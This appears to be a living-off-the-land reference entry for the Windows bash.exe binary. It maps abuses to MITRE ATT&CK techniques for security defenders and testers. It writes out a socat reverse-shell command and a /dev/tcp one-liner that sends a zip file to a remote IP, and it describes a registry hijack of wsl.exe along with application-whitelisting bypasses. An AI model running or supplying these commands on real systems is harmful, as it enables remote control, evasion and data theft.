Bash.exe

File used by Windows subsystem for Linux

AWL Bypass

Performs execution of specified file, can be used to bypass Application Whitelisting.

bash.exe -c "{CMD}"

Executes executable from bash.exe — MITRE: T1202 — Privileges: User

Execute

Performs execution of specified file, can be used as a defensive evasion.

bash.exe -c "{CMD}"

Executes executable from bash.exe — MITRE: T1202 — Privileges: User

Performs execution of specified file, can be used as a defensive evasion.

bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"

Executes a reverse shell — MITRE: T1202 — Privileges: User

Performs execution of specified file, can be used as a defensive evasion.

bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24'

Exfiltrate data — MITRE: T1202 — Privileges: User

Execute a payload as a child process of `bash.exe` while masquerading as WSL.

bash.exe

When executed, `bash.exe` queries the registry value of `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\MSI\InstallLocation`, which contains a folder path (`c:\program files\wsl` by default). If the value points to another folder containing a file named `wsl.exe`, it will be executed instead of the legitimate `wsl.exe` in the program files folder. — MITRE: T1218 — Privileges: User